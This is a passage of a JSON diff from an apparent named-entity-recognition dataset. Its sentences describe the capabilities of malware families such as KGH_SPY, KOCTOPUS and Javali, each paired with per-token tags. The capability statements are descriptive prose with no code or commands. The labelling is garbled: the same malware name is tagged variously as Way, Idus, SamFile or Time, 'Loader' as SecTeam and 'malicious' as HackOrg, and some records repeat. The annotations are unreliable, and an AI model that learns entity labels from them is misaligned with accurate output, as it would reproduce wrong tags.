+ "change", + "file", + "permissions", + "using", + "cacls.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "download", + "files", + "and", + "upgrade", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "contains", + "a", + "custom", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "obtain", + "the", + "permissions", + "of", + "the", + "victim", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "send", + "email", + "over", + "SMTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "JPIN", + "uses", + "a", + "encrypted", + "and", + "compressed", + "payload", + "that", + "is", + "disguised", + "as", + "a", + "bitmap", + "within", + "the", + "resource", + "section", + "of", + "the", + "installer." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "inject", + "content", + "into", + "lsass.exe", + "to", + "load", + "a", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "enumerate", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "checks", + "for", + "the", + "presence", + "of", + "certain", + "security-related", + "processes", + "and", + "deletes", + "its", + "installer/uninstaller", + "component", + "if", + "it", + "identifies", + "any", + "of", + "them." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "obtain", + "system", + "information", + "such", + "as", + "OS", + "version", + "and", + "disk", + "space." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "obtain", + "network", + "information,", + "including", + "DNS,", + "IP,", + "and", + "proxies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "obtain", + "the", + "victim", + "user", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "list", + "running", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "use", + "the", + "command-line", + "utility", + "cacls.exe", + "to", + "change", + "file", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "use", + "the", + "command-line", + "utility", + "cacls.exe", + "to", + "change", + "file", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "has", + "the", + "ability", + "to", + "download", + "malicious", + "executables", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "can", + "download", + "and", + "execute", + "JavaScript", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "has", + "been", + "executed", + "through", + "malicious", + "attachments", + "contained", + "in", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "has", + "the", + "ability", + "to", + "launch", + "scheduled", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "has", + "been", + "delivered", + "by", + "phishing", + "emails", + "containing", + "malicious", + "Microsoft", + "Excel", + "attachments." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "JSS", + "Loader", + "can", + "download", + "and", + "execute", + "VBScript", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Janicab", + "captured", + "audio", + "and", + "sent", + "it", + "out", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Janicab", + "used", + "a", + "valid", + "AppleDeveloperID", + "to", + "sign", + "the", + "code", + "to", + "get", + "past", + "security", + "restrictions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Janicab", + "used", + "a", + "cron", + "job", + "for", + "persistence", + "on", + "Mac", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Janicab", + "captured", + "screenshots", + "and", + "sent", + "them", + "out", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "can", + "use", + "large", + "obfuscated", + "libraries", + "to", + "hinder", + "detection", + "and", + "analysis." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "can", + "capture", + "login", + "credentials", + "from", + "open", + "browsers", + "including", + "Firefox,", + "Chrome,", + "Internet", + "Explorer,", + "and", + "Edge." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Javali", + "can", + "use", + "DLL", + "side-loading", + "to", + "load", + "malicious", + "DLLs", + "into", + "legitimate", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "can", + "read", + "C2", + "information", + "from", + "Google", + "Documents", + "and", + "YouTube." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "can", + "download", + "payloads", + "from", + "remote", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "has", + "achieved", + "execution", + "through", + "victims", + "opening", + "malicious", + "attachments,", + "including", + "MSI", + "files", + "with", + "embedded", + "VBScript." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "has", + "achieved", + "execution", + "through", + "victims", + "clicking", + "links", + "to", + "malicious", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "has", + "used", + "the", + "MSI", + "installer", + "to", + "download", + "and", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "can", + "monitor", + "processes", + "for", + "open", + "browsers", + "and", + "custom", + "banking", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Javali", + "has", + "been", + "delivered", + "as", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Javali", + "has", + "been", + "delivered", + "via", + "malicious", + "links", + "embedded", + "in", + "e-mails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Javali", + "has", + "used", + "embedded", + "VBScript", + "to", + "download", + "malicious", + "payloads", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KARAE", + "can", + "use", + "public", + "cloud-based", + "storage", + "providers", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KARAE", + "was", + "distributed", + "through", + "torrent", + "file-sharing", + "websites", + "to", + "South", + "Korean", + "victims,", + "using", + "a", + "YouTube", + "video", + "downloader", + "application", + "as", + "a", + "lure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Area", + "I-Area", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KARAE", + "can", + "upload", + "and", + "download", + "files,", + "including", + "second-stage", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KARAE", + "can", + "collect", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "has", + "the", + "capability", + "to", + "delete", + "files", + "off", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "has", + "a", + "command", + "to", + "search", + "for", + "files", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "can", + "upload", + "files", + "to", + "the", + "victim’s", + "machine", + "and", + "can", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "has", + "a", + "command", + "to", + "create", + "Registry", + "entries", + "for", + "storing", + "data", + "under", + "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "can", + "obtain", + "a", + "list", + "of", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "uses", + "a", + "customized", + "XOR", + "algorithm", + "to", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "has", + "the", + "capability", + "to", + "collect", + "the", + "computer", + "name,", + "language", + "settings,", + "the", + "OS", + "version,", + "CPU", + "information,", + "disk", + "devices,", + "and", + "time", + "elapsed", + "since", + "system", + "start." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "gathers", + "the", + "MAC", + "address", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYMARBLE", + "can", + "execute", + "shell", + "commands", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "KEYPLUG", + "can", + "use", + "TLS-encrypted", + "WebSocket", + "Protocol", + "(WSS)", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "KEYPLUG", + "Windows", + "variant", + "has", + "retrieved", + "C2", + "addresses", + "from", + "encoded", + "data", + "in", + "posts", + "on", + "tech", + "community", + "forums." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "can", + "decode", + "its", + "configuration", + "file", + "to", + "determine", + "C2", + "protocols." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "can", + "use", + "a", + "hardcoded", + "one-byte", + "XOR", + "encoded", + "configuration", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "can", + "use", + "TCP", + "and", + "KCP", + "(KERN", + "Communications", + "Protocol)", + "over", + "UDP", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "has", + "used", + "Cloudflare", + "CDN", + "associated", + "infrastructure", + "to", + "redirect", + "C2", + "communications", + "to", + "malicious", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "can", + "obtain", + "the", + "current", + "tick", + "count", + "of", + "an", + "infected", + "computer." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KEYPLUG", + "has", + "the", + "ability", + "to", + "communicate", + "over", + "HTTP", + "and", + "WebSocket", + "Protocol", + "(WSS)", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "collect", + "credentials", + "from", + "WINSCP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "the", + "ability", + "to", + "steal", + "data", + "from", + "the", + "Chrome,", + "Edge,", + "Firefox,", + "Thunderbird,", + "and", + "Opera", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "send", + "a", + "file", + "containing", + "victim", + "system", + "information", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "decrypt", + "encrypted", + "strings", + "and", + "write", + "them", + "to", + "a", + "newly", + "created", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "used", + "encrypted", + "strings", + "in", + "its", + "installer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "exfiltrate", + "collected", + "information", + "from", + "the", + "host", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "enumerate", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "code", + "from", + "remote", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "perform", + "keylogging", + "by", + "polling", + "the", + "<code>GetAsyncKeyState()</code>", + "function." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "save", + "collected", + "system", + "information", + "to", + "a", + "file", + "named", + "\"info\"", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "harvest", + "data", + "from", + "mail", + "clients." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "the", + "ability", + "to", + "set", + "the", + "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", + "Registry", + "key", + "to", + "execute", + "logon", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "been", + "spread", + "through", + "Word", + "documents", + "containing", + "malicious", + "macros." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "masqueraded", + "as", + "a", + "legitimate", + "Windows", + "tool." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "execute", + "PowerShell", + "commands", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "collect", + "information", + "on", + "installed", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "collect", + "drive", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "send", + "data", + "to", + "C2", + "with", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "has", + "the", + "ability", + "to", + "set", + "a", + "Registry", + "key", + "to", + "run", + "a", + "cmd.exe", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "KGH_SPY", + "can", + "collect", + "credentials", + "from", + "the", + "Windows", + "Credential", + "Manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "will", + "perform", + "UAC", + "bypass", + "either", + "through", + "fodhelper.exe", + "or", + "eventvwr.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "can", + "delete", + "created", + "registry", + "keys", + "used", + "for", + "persistence", + "as", + "part", + "of", + "its", + "cleanup", + "procedure." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "obfuscated", + "scripts", + "with", + "the", + "BatchEncryption", + "tool." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "deobfuscated", + "itself", + "before", + "executing", + "its", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "will", + "attempt", + "to", + "delete", + "or", + "disable", + "all", + "Registry", + "keys", + "and", + "scheduled", + "tasks", + "related", + "to", + "Microsoft", + "Security", + "Defender", + "and", + "Security", + "Essentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "used", + "<code>-WindowsStyle", + "Hidden</code>", + "to", + "hide", + "the", + "command", + "window." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "executed", + "a", + "PowerShell", + "command", + "to", + "download", + "a", + "file", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "relied", + "on", + "victims", + "clicking", + "a", + "malicious", + "document", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "relied", + "on", + "victims", + "clicking", + "on", + "a", + "malicious", + "link", + "delivered", + "via", + "email." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "been", + "disguised", + "as", + "legitimate", + "software", + "programs", + "associated", + "with", + "the", + "travel", + "and", + "airline", + "industries." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "added", + "and", + "deleted", + "keys", + "from", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "can", + "use", + "the", + "`LoadResource`", + "and", + "`CreateProcessW`", + "APIs", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "used", + "PowerShell", + "commands", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "deployed", + "a", + "modified", + "version", + "of", + "Invoke-Ngrok", + "to", + "expose", + "open", + "local", + "ports", + "to", + "the", + "Internet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "can", + "set", + "the", + "AutoRun", + "Registry", + "key", + "with", + "a", + "PowerShell", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "been", + "distributed", + "via", + "spearphishing", + "emails", + "with", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "been", + "distributed", + "as", + "a", + "malicious", + "link", + "within", + "an", + "email." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "checked", + "the", + "OS", + "version", + "using", + "`wmic.exe`", + "and", + "the", + "`find`", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "used", + "VBScript", + "to", + "call", + "wscript", + "to", + "execute", + "a", + "PowerShell", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOCTOPUS", + "has", + "used", + "`cmd.exe`", + "and", + "batch", + "files", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOMPROGO", + "is", + "capable", + "of", + "retrieving", + "information", + "about", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOMPROGO", + "is", + "capable", + "of", + "creating", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOMPROGO", + "is", + "capable", + "of", + "running", + "WMI", + "queries." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "encrypted", + "data", + "and", + "files", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "bypassed", + "UAC", + "by", + "performing", + "token", + "impersonation", + "as", + "well", + "as", + "an", + 